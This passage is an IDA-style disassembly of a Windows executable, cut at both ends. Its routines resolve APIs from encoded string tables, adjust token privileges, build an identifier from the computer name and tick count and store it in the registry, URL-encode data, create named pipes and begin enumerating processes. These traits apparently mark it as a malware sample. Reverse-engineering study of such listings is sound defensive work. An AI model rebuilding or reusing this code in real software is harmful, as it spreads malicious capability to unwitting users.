push dword_40FB30
call dword_40FBD0
xor ebx, ebx
test eax, eax
jz short loc_40A3CF
lea eax, [ebp+var_10]
push eax
mov eax, dword_40FB34
push dword ptr [eax+80h]
push ebx
call dword_40FBC8
test eax, eax
jz short loc_40A3CF
push ebx
push ebx
push ebx
lea eax, [ebp+var_14]
push eax
push ebx
push [ebp+var_4]
mov [ebp+var_14], 1
mov [ebp+var_8], 2
call dword_40FBCC
loc_40A3CF: ; CODE XREF: sub_40A377+1D�j
; sub_40A377+37�j
xor eax, eax
cmp [ebp+arg_0], bl
push ebx
setnz al
inc eax
or eax, 4
push eax
call dword_40FACC
test eax, eax
setnz al
pop ebx
leave
retn
sub_40A377 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A3EB proc near ; CODE XREF: sub_40B154+31�p
; sub_40B1A0+35�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
push [ebp+arg_0]
mov esi, eax
push esi
call sub_408CAE
test al, al
pop ecx
pop ecx
jz short loc_40A46F
mov ebx, [ebp+arg_C]
and ebx, 1
xor edi, edi
loc_40A40A: ; CODE XREF: sub_40A3EB+82�j
cmp ebx, edi
jz short loc_40A430
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_40FD94 ; lstrlenA
push eax
push esi
loc_40A420: ; CODE XREF: sub_40A3EB+5D�j
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40A45F
loc_40A42C: ; CODE XREF: sub_40A3EB+72�j
mov eax, esi
jmp short loc_40A471
; ---------------------------------------------------------------------------
loc_40A430: ; CODE XREF: sub_40A3EB+21�j
test byte ptr [ebp+arg_C], 2
jz short loc_40A44A
push edi
push edi
push edi
push esi
call dword_40FD94 ; lstrlenA
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_40A420
; ---------------------------------------------------------------------------
loc_40A44A: ; CODE XREF: sub_40A3EB+49�j
push [ebp+arg_8]
push 0FFFFFFFFh
push [ebp+arg_4]
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_40A42C
loc_40A45F: ; CODE XREF: sub_40A3EB+3F�j
push 1
push esi
call sub_408CD4
mov esi, eax
cmp esi, edi
pop ecx
pop ecx
jnz short loc_40A40A
loc_40A46F: ; CODE XREF: sub_40A3EB+15�j
xor eax, eax
loc_40A471: ; CODE XREF: sub_40A3EB+43�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40A3EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A476 proc near ; CODE XREF: sub_40325F+56�p
; sub_40412F+30�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
test esi, esi
push edi
jz short loc_40A485
and dword ptr [esi], 0
loc_40A485: ; CODE XREF: sub_40A476+A�j
push 10h
push [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax
mov eax, dword_40FB34
push esi
push 10h
push dword ptr [eax+2Ch]
call sub_4095AA
mov edi, eax
add esp, 18h
test edi, edi
jz short loc_40A4BD
test esi, esi
jz short loc_40A4BD
mov esi, [esi]
test esi, esi
jz short loc_40A4BD
push 0
push edi
push esi
call sub_409A6F
add esp, 0Ch
loc_40A4BD: ; CODE XREF: sub_40A476+2F�j
; sub_40A476+33�j ...
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_40A476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4C3 proc near ; CODE XREF: sub_40325F+116�p
; sub_403C06+AF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
lea eax, [ebx+10h]
push esi
push eax
mov [ebp+arg_8], eax
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jnz short loc_40A4E2
xor al, al
jmp short loc_40A52C
; ---------------------------------------------------------------------------
loc_40A4E2: ; CODE XREF: sub_40A4C3+19�j
push edi
push 10h
push [ebp+arg_0]
push esi
call sub_409331
push ebx
push [ebp+arg_4]
lea edi, [esi+10h]
push edi
call sub_409331
push 0
push ebx
push edi
call sub_409A0E
push [ebp+arg_8]
mov eax, dword_40FB34
push esi
push 0
push 0
push 0Fh
push dword ptr [eax+2Ch]
call sub_4095AA
test eax, eax
push esi
setnbe bl
call sub_409317
add esp, 40h
mov al, bl
pop edi
loc_40A52C: ; CODE XREF: sub_40A4C3+1D�j
pop esi
pop ebx
pop ebp
retn
sub_40A4C3 endp
; =============== S U B R O U T I N E =======================================
sub_40A530 proc near ; CODE XREF: sub_4070E1+5�p
; sub_4070E1+11�p ...
arg_0 = dword ptr 4
mov eax, dword_40FB34
push 10h
push [esp+4+arg_0]
push 0
push 0
push 11h
push dword ptr [eax+2Ch]
call sub_4095AA
xor ecx, ecx
add esp, 18h
cmp ecx, eax
sbb eax, eax
neg eax
retn
sub_40A530 endp
; =============== S U B R O U T I N E =======================================
sub_40A555 proc near ; CODE XREF: sub_40AAA0+4�p
arg_0 = byte ptr 4
push 61h
push offset off_402A68
push offset dword_4031D0
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FD30, eax
jnz short loc_40A575
loc_40A572: ; CODE XREF: sub_40A555+3B�j
xor al, al
retn
; ---------------------------------------------------------------------------
loc_40A575: ; CODE XREF: sub_40A555+1B�j
push 1
push offset off_402D70
push offset dword_4031C0
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FBA4, eax
jz short loc_40A572
push ebx
mov bl, [esp+4+arg_0]
test bl, 8
jz short loc_40A5BD
push 7
push offset off_402D78
push offset dword_401088
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FC24, eax
jz loc_40A6EF
loc_40A5BD: ; CODE XREF: sub_40A555+45�j
push 0Dh
push offset off_402DB0
push offset dword_4031B0
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FC6C, eax
jz loc_40A6EF
push 1
push offset off_402E18
push offset dword_4031A4
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FCA8, eax
jz loc_40A6EF
test bl, 20h
jz short loc_40A625
push 1Ah
push offset off_402E20
push offset dword_40105C
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FB38, eax
jz loc_40A6EF
loc_40A625: ; CODE XREF: sub_40A555+AD�j
push 16h
push offset off_402EF0
push offset dword_403194
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FBC0, eax
jz loc_40A6EF
test bl, 10h
jz short loc_40A66C
push 12h
push offset off_402FA0
push offset dword_40106C
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FCB8, eax
jz loc_40A6EF
loc_40A66C: ; CODE XREF: sub_40A555+F4�j
test bl, 4
jz short loc_40A68E
push 3
push offset off_403030
push offset dword_401078
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FBB0, eax
jz short loc_40A6EF
loc_40A68E: ; CODE XREF: sub_40A555+11A�j
test bl, 2
jz short loc_40A6B0
push 18h
push offset off_403048
push offset dword_401050
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FAC8, eax
jz short loc_40A6EF
loc_40A6B0: ; CODE XREF: sub_40A555+13C�j
push 1
push offset off_403108
push offset aZspjudv ; "\tµ°§spjž¤¢"
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FC64, eax
jz short loc_40A6EF
test bl, 40h
jz short loc_40A6F3
push 7
push offset off_403110
push offset dword_401040
call sub_4099A9
add esp, 0Ch
test eax, eax
mov dword_40FC44, eax
jnz short loc_40A6F3
loc_40A6EF: ; CODE XREF: sub_40A555+62�j
; sub_40A555+83�j ...
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40A6F3: ; CODE XREF: sub_40A555+17B�j
; sub_40A555+198�j
mov al, 1
pop ebx
retn
sub_40A555 endp
; =============== S U B R O U T I N E =======================================
sub_40A6F7 proc near ; CODE XREF: sub_403C06+38�p
; sub_40471E+79�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
xor ebx, ebx
cmp [esp+4+arg_0], ebx
jnz short loc_40A704
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40A704: ; CODE XREF: sub_40A6F7+7�j
mov eax, [esp+4+arg_4]
cmp eax, 0FFFFFFFFh
jnz short loc_40A717
push [esp+4+arg_0]
call dword_40FD90 ; lstrlenW
loc_40A717: ; CODE XREF: sub_40A6F7+14�j
push esi
lea esi, [eax+1]
push edi
push esi
call sub_4092F9
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_40A741
push ebx
push ebx
lea eax, [esi-1]
push eax
push edi
push eax
push [esp+20h+arg_0]
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov [edi+esi-1], bl
loc_40A741: ; CODE XREF: sub_40A6F7+30�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_40A6F7 endp
; =============== S U B R O U T I N E =======================================
sub_40A747 proc near ; CODE XREF: sub_4061D1+D2�p
; sub_4069E5+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jnz short loc_40A751
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40A751: ; CODE XREF: sub_40A747+5�j
mov eax, [esp+arg_4]
cmp eax, 0FFFFFFFFh
jnz short loc_40A764
push [esp+arg_0]
call dword_40FD94 ; lstrlenA
loc_40A764: ; CODE XREF: sub_40A747+11�j
push esi
lea esi, [eax+1]
push edi
push esi
call sub_4092F9
mov edi, eax
test edi, edi
pop ecx
jz short loc_40A78C
lea eax, [esi-1]
push eax
push [esp+0Ch+arg_0]
push edi
call sub_409331
add esp, 0Ch
mov byte ptr [edi+esi-1], 0
loc_40A78C: ; CODE XREF: sub_40A747+2D�j
mov eax, edi
pop edi
pop esi
retn
sub_40A747 endp
; =============== S U B R O U T I N E =======================================
sub_40A791 proc near ; CODE XREF: sub_403F78+6F�p
; sub_404034+4A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jnz short loc_40A79B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40A79B: ; CODE XREF: sub_40A791+5�j
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_4]
cmp edi, 0FFFFFFFFh
jnz short loc_40A7B3
push [esp+0Ch+arg_0]
call dword_40FD94 ; lstrlenA
mov edi, eax
loc_40A7B3: ; CODE XREF: sub_40A791+14�j
lea esi, [edi+edi+2]
push esi
call sub_4092F9
mov ebx, eax
test ebx, ebx
pop ecx
jz short loc_40A7DB
push edi
push ebx
push edi
push [esp+18h+arg_0]
push 0
push 0
call dword_40FE60 ; MultiByteToWideChar
and word ptr [esi+ebx-2], 0
loc_40A7DB: ; CODE XREF: sub_40A791+31�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40A791 endp
; =============== S U B R O U T I N E =======================================
sub_40A7E1 proc near ; CODE XREF: sub_404416+B4�p
; sub_408088+CD�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_40A7EE
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_40A7EE: ; CODE XREF: sub_40A7E1+7�j
push esi
push edi
call dword_40FD90 ; lstrlenW
inc eax
add eax, eax
push eax
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jz short loc_40A80E
push edi
push esi
call dword_40FD98 ; lstrcpyW
loc_40A80E: ; CODE XREF: sub_40A7E1+23�j
mov eax, esi
pop esi
pop edi
retn
sub_40A7E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A813 proc near ; CODE XREF: sub_40AC72+1E8�p
; sub_40BAC3+9E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push edi
mov edi, [ebp+arg_4]
mov eax, [edi]
imul eax, 3
inc eax
push eax
call sub_4092F9
pop ecx
mov ecx, eax
xor ebx, ebx
cmp ecx, ebx
mov [ebp+var_4], ecx
jnz short loc_40A838
xor al, al
jmp short loc_40A8B1
; ---------------------------------------------------------------------------
loc_40A838: ; CODE XREF: sub_40A813+1F�j
push esi
xor esi, esi
cmp [edi], ebx
mov edi, [ebp+arg_0]
jbe short loc_40A89C
loc_40A842: ; CODE XREF: sub_40A813+87�j
mov eax, [edi]
mov al, [ebx+eax]
cmp al, 20h
mov [esi+ecx], al
jnz short loc_40A854
mov byte ptr [esi+ecx], 2Bh
jmp short loc_40A893
; ---------------------------------------------------------------------------
loc_40A854: ; CODE XREF: sub_40A813+39�j
cmp al, 30h
jge short loc_40A860
cmp al, 2Dh
jz short loc_40A860
cmp al, 2Eh
jnz short loc_40A878
loc_40A860: ; CODE XREF: sub_40A813+43�j
; sub_40A813+47�j
cmp al, 41h
jge short loc_40A868
cmp al, 39h
jg short loc_40A878
loc_40A868: ; CODE XREF: sub_40A813+4F�j
cmp al, 5Ah
jle short loc_40A874
cmp al, 61h
jge short loc_40A874
cmp al, 5Fh
jnz short loc_40A878
loc_40A874: ; CODE XREF: sub_40A813+57�j
; sub_40A813+5B�j
cmp al, 7Ah
jle short loc_40A893
loc_40A878: ; CODE XREF: sub_40A813+4B�j
; sub_40A813+53�j ...
mov byte ptr [esi+ecx], 25h
inc esi
lea eax, [esi+ecx]
push eax
mov eax, [edi]
movzx eax, byte ptr [eax+ebx]
push eax
call sub_40929E
pop ecx
pop ecx
mov ecx, [ebp+var_4]
inc esi
loc_40A893: ; CODE XREF: sub_40A813+3F�j
; sub_40A813+63�j
mov eax, [ebp+arg_4]
inc ebx
inc esi
cmp ebx, [eax]
jb short loc_40A842
loc_40A89C: ; CODE XREF: sub_40A813+2D�j
push dword ptr [edi]
call sub_409317
mov eax, [ebp+var_4]
mov [edi], eax
mov eax, [ebp+arg_4]
pop ecx
mov [eax], esi
mov al, 1
pop esi
loc_40A8B1: ; CODE XREF: sub_40A813+23�j
pop edi
pop ebx
leave
retn
sub_40A813 endp
; =============== S U B R O U T I N E =======================================
sub_40A8B5 proc near ; CODE XREF: sub_404AAD+85�p
; sub_404AAD+8B�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
push edi
call dword_40FD94 ; lstrlenA
test eax, eax
jbe short loc_40A91D
add eax, edi
cmp edi, eax
push esi
mov ecx, edi
lea esi, [eax-1]
jnb short loc_40A901
loc_40A8D1: ; CODE XREF: sub_40A8B5+35�j
mov dl, [ecx]
cmp dl, 0Dh
jz short loc_40A8E7
cmp dl, 0Ah
jz short loc_40A8E7
cmp dl, 20h
jz short loc_40A8E7
cmp dl, 9
jnz short loc_40A901
loc_40A8E7: ; CODE XREF: sub_40A8B5+21�j
; sub_40A8B5+26�j ...
inc ecx
cmp ecx, eax
jb short loc_40A8D1
jmp short loc_40A901
; ---------------------------------------------------------------------------
loc_40A8EE: ; CODE XREF: sub_40A8B5+4E�j
mov al, [esi]
cmp al, 0Dh
jz short loc_40A900
cmp al, 0Ah
jz short loc_40A900
cmp al, 20h
jz short loc_40A900
cmp al, 9
jnz short loc_40A905
loc_40A900: ; CODE XREF: sub_40A8B5+3D�j
; sub_40A8B5+41�j ...
dec esi
loc_40A901: ; CODE XREF: sub_40A8B5+1A�j
; sub_40A8B5+30�j ...
cmp esi, ecx
ja short loc_40A8EE
loc_40A905: ; CODE XREF: sub_40A8B5+49�j
cmp edi, ecx
jnb short loc_40A918
mov eax, esi
sub eax, ecx
push eax
push ecx
push edi
call sub_409331
add esp, 0Ch
loc_40A918: ; CODE XREF: sub_40A8B5+52�j
mov byte ptr [esi+1], 0
pop esi
loc_40A91D: ; CODE XREF: sub_40A8B5+E�j
pop edi
retn
sub_40A8B5 endp
; =============== S U B R O U T I N E =======================================
sub_40A91F proc near ; CODE XREF: sub_404624+B6�p
; .text:00404818�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short loc_40A941
mov eax, [esp+arg_4]
add eax, 2
push eax
push [esp+4+arg_0]
push 8
push dword_40FCB4
call dword_40FDD0 ; RtlReAllocateHeap
retn
; ---------------------------------------------------------------------------
loc_40A941: ; CODE XREF: sub_40A91F+5�j
push [esp+arg_4]
call sub_4092F9
pop ecx
retn
sub_40A91F endp
; =============== S U B R O U T I N E =======================================
sub_40A94C proc near ; CODE XREF: sub_404C11+CA�p
; sub_405A22+20�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push 0
push [esp+8+arg_0]
call sub_409395
add esp, 0Ch
retn
sub_40A94C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A95F proc near ; CODE XREF: sub_4057EE+A5�p
; sub_4087B5+9D�p
var_208 = byte ptr -208h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 208h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_208]
call sub_4093DB
push 14h
call sub_4092F9
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
pop ecx
jnz short loc_40A990
loc_40A989: ; CODE XREF: sub_40A95F+5E�j
xor eax, eax
jmp loc_40AA3E
; ---------------------------------------------------------------------------
loc_40A990: ; CODE XREF: sub_40A95F+28�j
push edi
push edi
mov eax, 200h
push eax
push eax
push 0FFh
push 6
push 3
lea eax, [ebp+var_208]
push eax
call dword_40FDE4 ; CreateNamedPipeW
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40A9BF
push esi
call sub_409317
loc_40A9BC: ; CODE XREF: sub_40A95F+C9�j
pop ecx
jmp short loc_40A989
; ---------------------------------------------------------------------------
loc_40A9BF: ; CODE XREF: sub_40A95F+55�j
push edi
push edi
push edi
push edi
call dword_40FDC4 ; CreateEventW
push edi
push edi
push edi
push edi
mov [esi+4], eax
call dword_40FDC4 ; CreateEventW
push [ebp+arg_4]
mov [esi+8], eax
mov eax, [ebp+arg_0]
mov [esi+0Ch], eax
call sub_40A7E1
pop ecx
push edi
push edi
push esi
push offset sub_4093FA
push edi
push edi
mov [esi+10h], eax
call dword_40FE10 ; CreateThread
cmp eax, edi
jnz short loc_40AA2A
push dword ptr [esi]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+4]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+10h]
call sub_409317
push esi
call sub_409317
pop ecx
jmp short loc_40A9BC
; ---------------------------------------------------------------------------
loc_40AA2A: ; CODE XREF: sub_40A95F+9E�j
push eax
call dword_40FDAC ; CloseHandle
push 0FFFFFFFFh
push dword ptr [esi+8]
call dword_40FDB8 ; WaitForSingleObject
mov eax, esi
loc_40AA3E: ; CODE XREF: sub_40A95F+2C�j
pop edi
pop esi
leave
retn
sub_40A95F endp
; =============== S U B R O U T I N E =======================================
sub_40AA42 proc near ; CODE XREF: sub_4057EE+22B�p
; sub_4087B5+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
xor edi, edi
cmp esi, edi
jz short loc_40AA9D
push dword ptr [esi+4]
call dword_40FDBC ; SetEvent
push edi
push edi
push edi
push edi
push edi
push [esp+1Ch+arg_0]
call sub_4095AA
add esp, 18h
push 0FFFFFFFFh
push dword ptr [esi+8]
call dword_40FDB8 ; WaitForSingleObject
push dword ptr [esi]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+4]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+10h]
call sub_409317
push esi
call sub_409317
pop ecx
pop ecx
loc_40AA9D: ; CODE XREF: sub_40AA42+A�j
pop edi
pop esi
retn
sub_40AA42 endp
; =============== S U B R O U T I N E =======================================
sub_40AAA0 proc near ; CODE XREF: sub_40AAD4+14�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_40A555
test al, al
pop ecx
jnz short loc_40AAAF
retn
; ---------------------------------------------------------------------------
loc_40AAAF: ; CODE XREF: sub_40AAA0+C�j
call dword_40FD60 ; GetProcessHeap
or dword_40FB30, 0FFFFFFFFh
push offset sub_4099A9
mov dword_40FCB4, eax
call sub_409E08
mov dword_40FCB0, eax
pop ecx
mov al, 1
retn
sub_40AAA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAD4 proc near ; CODE XREF: sub_404222+50�p
; .text:004051D2�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
push [ebp+arg_0]
xor ebx, ebx
mov dword_40FC20, ebx
call sub_40AAA0
test al, al
pop ecx
jz short loc_40AB6A
push 1BCh
call sub_4092F9
cmp eax, ebx
pop ecx
mov dword_40FB34, eax
jz short loc_40AB6A
mov [ebp+var_4], ebx
loc_40AB09: ; CODE XREF: sub_40AAD4+AE�j
movzx esi, word ptr [ebp+var_4]
shl esi, 2
mov eax, off_40F408[esi]
movzx eax, byte ptr [eax]
inc eax
push eax
call sub_4092F9
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_40AB6A
push edi
push off_40F408[esi]
call sub_40996F
cmp byte ptr [edi], 57h
pop ecx
pop ecx
jnz short loc_40AB71
mov eax, off_40F408[esi]
movzx eax, byte ptr [eax]
dec eax
push eax
lea eax, [edi+1]
push eax
call sub_40A791
mov ecx, dword_40FB34
push edi
mov [esi+ecx], eax
call sub_409317
mov eax, dword_40FB34
add esp, 0Ch
cmp [esi+eax], ebx
jnz short loc_40AB7A
loc_40AB6A: ; CODE XREF: sub_40AAD4+1C�j
; sub_40AAD4+30�j ...
xor al, al
loc_40AB6C: ; CODE XREF: sub_40AAD4+199�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AB71: ; CODE XREF: sub_40AAD4+64�j
mov eax, dword_40FB34
inc edi
mov [esi+eax], edi
loc_40AB7A: ; CODE XREF: sub_40AAD4+94�j
inc [ebp+var_4]
cmp word ptr [ebp+var_4], 6Fh
jb short loc_40AB09
call dword_40FE44 ; GetCurrentProcessId
test byte ptr [ebp+arg_0], 1
mov dword_40FCA4, eax
mov eax, dword_40FCB0
mov dword_40FC1C, eax
jz short loc_40ABBE
mov eax, dword_40FB34
push dword ptr [eax+78h]
push dword_40FD30
call dword_40FD04 ; GetProcAddress
cmp eax, ebx
jz short loc_40ABBE
push 8007h
call eax ; dword_40FB34
loc_40ABBE: ; CODE XREF: sub_40AAD4+C9�j
; sub_40AAD4+E1�j
xor edi, edi
inc edi
push edi
mov esi, offset dword_40FD0C
push esi
call dword_40FBF4
push ebx
push ebx
push edi
push esi
call dword_40FBF8
lea eax, [ebp+var_C]
push eax
push 28h
push dword_40FB30
mov dword_40FD24, 0Ch
mov dword_40FD28, esi
mov dword_40FD2C, ebx
call dword_40FBD0
test eax, eax
jz short loc_40AC5F
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push dword ptr [eax+7Ch]
push ebx
call dword_40FBC8
test eax, eax
jz short loc_40AC56
mov eax, [ebp+var_8]
push ebx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
push ebx
push 10h
mov [ebp+var_14], eax
lea eax, [ebp+var_1C]
push eax
push ebx
push [ebp+var_C]
mov [ebp+var_1C], edi
mov [ebp+var_10], 2
call dword_40FBCC
call dword_40FD78 ; RtlGetLastWin32Error
cmp eax, 514h
jnz short loc_40AC56
or dword_40FC20, edi
loc_40AC56: ; CODE XREF: sub_40AAD4+145�j
; sub_40AAD4+17A�j
push [ebp+var_C]
call dword_40FDAC ; CloseHandle
loc_40AC5F: ; CODE XREF: sub_40AAD4+12E�j
call dword_40FD5C ; GetUserDefaultUILanguage
mov word_40FBAC, ax
mov al, 1
jmp loc_40AB6C
sub_40AAD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC72 proc near ; CODE XREF: sub_404222+99�p
; sub_40712D+20�p ...
var_27C = byte ptr -27Ch
var_74 = byte ptr -74h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 27Ch
mov eax, dword_40FC20
and al, 1
neg al
push ebx
push esi
push edi
push 208h
mov [ebp+var_4], 206h
sbb eax, eax
add eax, 80000002h
mov [ebp+var_C], eax
lea eax, [ebp+var_27C]
push eax
call sub_40A94C
mov edi, [ebp+arg_0]
pop ecx
xor ebx, ebx
cmp edi, 0FFFFFFFFh
pop ecx
jz loc_40AD58
cmp edi, ebx
jz short loc_40ACEE
cmp [edi], bx
jz short loc_40ACEE
push edi
call dword_40FD90 ; lstrlenW
mov esi, eax
add esi, esi
mov eax, 204h
cmp esi, eax
jnb short loc_40ACD8
mov eax, esi
loc_40ACD8: ; CODE XREF: sub_40AC72+62�j
push eax
lea eax, [ebp+var_27C]
push edi
push eax
call sub_409331
add esp, 0Ch
jmp loc_40ADAC
; ---------------------------------------------------------------------------
loc_40ACEE: ; CODE XREF: sub_40AC72+49�j
; sub_40AC72+4E�j
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 1
push ebx
push ebx
push ebx
push dword ptr [eax+40h]
push [ebp+var_C]
call dword_40FBE0
test eax, eax
jnz short loc_40AD58
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_27C]
push eax
lea eax, [ebp+var_10]
push eax
mov eax, dword_40FB34
push ebx
push dword ptr [eax+44h]
push [ebp+var_8]
call dword_40FBDC
test eax, eax
jnz short loc_40AD43
cmp [ebp+var_10], 1
jnz short loc_40AD43
cmp [ebp+var_4], 4
mov byte ptr [ebp+arg_0+3], 1
ja short loc_40AD46
loc_40AD43: ; CODE XREF: sub_40AC72+BF�j
; sub_40AC72+C5�j
mov byte ptr [ebp+arg_0+3], bl
loc_40AD46: ; CODE XREF: sub_40AC72+CF�j
push [ebp+var_8]
call dword_40FBE4
cmp byte ptr [ebp+arg_0+3], bl
jnz loc_40ADF8
loc_40AD58: ; CODE XREF: sub_40AC72+41�j
; sub_40AC72+9A�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_74]
push eax
mov [ebp+var_4], 31h
call dword_40FEA0 ; GetComputerNameW
test eax, eax
jnz short loc_40AD80
push offset aUnknown ; "unknown"
lea eax, [ebp+var_74]
push eax
call dword_40FD98 ; lstrcpyW
loc_40AD80: ; CODE XREF: sub_40AC72+FD�j
call dword_40FDE8 ; GetTickCount
push eax
lea eax, [ebp+var_74]
push eax
mov eax, dword_40FB34
push dword ptr [eax+64h]
lea eax, [ebp+var_27C]
push 103h
push eax
call dword_40FC84
mov esi, eax
add esp, 14h
add esi, esi
loc_40ADAC: ; CODE XREF: sub_40AC72+77�j
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 2
push ebx
push ebx
inc esi
push ebx
inc esi
mov [ebp+var_4], esi
push dword ptr [eax+40h]
push [ebp+var_C]
call dword_40FBE0
test eax, eax
jnz short loc_40ADF8
push [ebp+var_4]
lea eax, [ebp+var_27C]
push eax
mov eax, dword_40FB34
push 1
push ebx
push dword ptr [eax+44h]
push [ebp+var_8]
call dword_40FBE8
push [ebp+var_8]
call dword_40FBE4
loc_40ADF8: ; CODE XREF: sub_40AC72+E0�j
; sub_40AC72+15D�j
mov eax, [ebp+var_4]
shr eax, 1
dec eax
push eax
mov [ebp+var_4], eax
lea eax, [ebp+var_27C]
push eax
call sub_40A6F7
pop ecx
pop ecx
push [ebp+var_4]
mov esi, eax
push esi
call dword_40FAD0
xor ecx, ecx
cmp [ebp+var_4], ebx
jbe short loc_40AE40
loc_40AE23: ; CODE XREF: sub_40AC72+1CC�j
mov al, [ecx+esi]
cmp al, 61h
jl short loc_40AE2E
cmp al, 7Ah
jle short loc_40AE3A
loc_40AE2E: ; CODE XREF: sub_40AC72+1B6�j
cmp al, 30h
jl short loc_40AE36
cmp al, 39h
jle short loc_40AE3A
loc_40AE36: ; CODE XREF: sub_40AC72+1BE�j
mov byte ptr [ecx+esi], 5Fh
loc_40AE3A: ; CODE XREF: sub_40AC72+1BA�j
; sub_40AC72+1C2�j
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_40AE23
loc_40AE40: ; CODE XREF: sub_40AC72+1AF�j
push [ebp+var_4]
mov dword_40FD20, esi
push esi
call sub_40A747
mov [ebp+arg_0], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40A813
mov eax, [ebp+arg_0]
add esp, 10h
pop edi
pop esi
mov dword_40FB2C, eax
pop ebx
leave
retn
sub_40AC72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE6F proc near ; CODE XREF: .text:00405599�p
; sub_4057EE+131�p
var_C58 = byte ptr -0C58h
var_A50 = byte ptr -0A50h
var_848 = byte ptr -848h
var_640 = word ptr -640h
var_438 = dword ptr -438h
var_430 = dword ptr -430h
var_414 = byte ptr -414h
var_20C = word ptr -20Ch
var_20A = word ptr -20Ah
var_208 = word ptr -208h
var_206 = word ptr -206h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C58h
push ebx
push edi
xor edi, edi
push edi
push 2
call dword_40FE14 ; CreateToolhelp32Snapshot
